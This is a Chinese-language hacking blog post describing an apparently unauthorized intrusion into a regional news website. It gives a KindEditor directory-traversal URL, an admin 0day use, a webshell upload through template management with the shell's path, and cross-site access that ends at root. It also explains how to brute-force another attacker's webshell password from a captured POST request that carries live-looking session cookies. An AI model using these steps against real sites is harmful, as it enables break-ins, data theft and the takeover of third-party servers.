渗透某地方大型新闻网站

前段时间拿的一个站,在哈客发过,不过看的人不是很多,看网上也没传开就发这边来了.
文章技术含量不是很高.

我觉得这种也能算是原创的吧 ..

目标news.xxxx.net

首先收集信息这个就不用说了,大家都知道

这个码打的比较性感哈哈

再来扫个目录

很神奇的发现可以列目录..看来有戏.

但是翻来翻去没翻到什么东西..决定从旁站出发

先从主站www.xxx.net这个开始吧

扫出了各种目录

有FCK..不过尝试后发现已经补上洞了

又开始了漫长的翻目录行动..翻来翻去没翻到什么可以利用的..

又换了个旁

换到了blog.xxx.net

这次有收获了..

是kindeditor,我记得这个有个遍历目录的漏洞..

利用方法

http://blog.xxx.net/editor/php/file_manager_json.php?path=/

坑爹找了一下…网站根居然不在var/www这个文件夹里面

最后终于在data/www里面找了…蛋疼

最后试了几个旁注工具上没显示出来的站

123.xxx.net

test.xxx.net

demo.xxx.net

123这个分站打开发现是114la的网站导航

前段时候有0day 就试了下

ok可以了

密码解密一下登录后台

后台我也不截图了..shell什么的也不截图了.太简单了= =

拿shell见这篇文章

http://lcx.cc/?FoxNews=1796.html

后台点击模板管理—>分类模板–>添加模板

直接添加后缀为php或asp的都可以

内容写个一句话

马在admin/tpls/tpls/main/greenclass/目录下

http://123.xxx.net/admin/tpls/tpls/main/greenclass/my.php

现在跨站了

找目录找的我纠结..大家看前面的图片应该也知道了

没有news.xxx.net这个目录..

后来我想会不会是在www.xxx.net这个主目录下面的某个文件夹

后来我点进news文件夹传了个txt

怀着忐忑的心情打开..

到此此次检测就算是结束了.其实这个shell权限很大.是root.因为要的就是webshell所以www.91ri.org就没打算再提权了.呵呵

最后再来个番外篇..网上貌似有教程的,不过有些写的也不是很清楚,就一并写下好了.

在翻目录的时候发现了前人的脚步.某个输错密码无回显的shell.

尝试了一些密码但是没法破解..就试试看跑字典.但最后也没跑出来.

但还是在这里说说怎么用t00ls牛们的工具破解无回显shell的密码吧..

工具是这个大家可以自己去baidu..

现在说说怎么用

先抓个输入错误密码的包..把post的数据抓出来

POST /fckeditor/editor/filemanager/connectors/php/xxx.php HTTP/1.1

Host: www.xxx.net

Connection: keep-alive

Referer: http://www.xxx.net/fckeditor/edi … nectors/php/xxx.php

Content-Length: 33

Cache-Control: max-age=0

Origin: http://www.xxx.net

Content-Type: application/x-www-form-urlencoded

Accept: application/xml,application/xhtml

+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko)

Maxthon/3.0 Safari/534.12

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN,zh;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

Cookie:

wespaceuser=Ah8AHQUnQl9PXwgXCx52AhgCAFdBXCcGSl1NV0xUBh1QHQIeB0sEG1hLBBYAAUtXHAUYAkoAHDAe;

AJSTAT_ok_times=1; rTvgYGhchbcookietime=0; rTvgYGhchbusername=hzck1999;

PHPSESSID=bnkc817f11htk4huq67p7nfpd1; cdb_sid=OhXi57;

__utma=125976530.309523011.1322900520.1322900520.1322904263.2; __utmc=125976530;

__utmz=125976530.1322900520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);

Hm_lvt_9dad9a39dc2779b297b1621b72055626=1322906408673;

Hm_lpvt_9dad9a39dc2779b297b1621b72055626=1322906408673

password=sss&doing=login

这里这么填…注意把密码段改成字典的变量

然后看看返回信息

看我标蓝得这段是密码输错的时候返回的信息..就拿这段作为关键字

密码字典再设一下

点start就可以开始破了..

如果破出来结果输出那边就会有密码了…

好啦就到这里啦..本人小菜.文章技术含量没有,只有细心的翻目录才出的结果.希望大牛勿喷..还是那句话,其实入侵的过程是比谁耐心,谁细心的过程..技术总是只有那么一些的.

91ri.org:虽然文章略老不过那种耐心的精神是不会老的!小编经常为了一个站要搞上好几天而且往往是结局是:众里寻他千百度,蓦然回首,那”洞”却在灯火阑珊处。所以说细心也很重要啊 呵呵。

本文作者:Milco由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。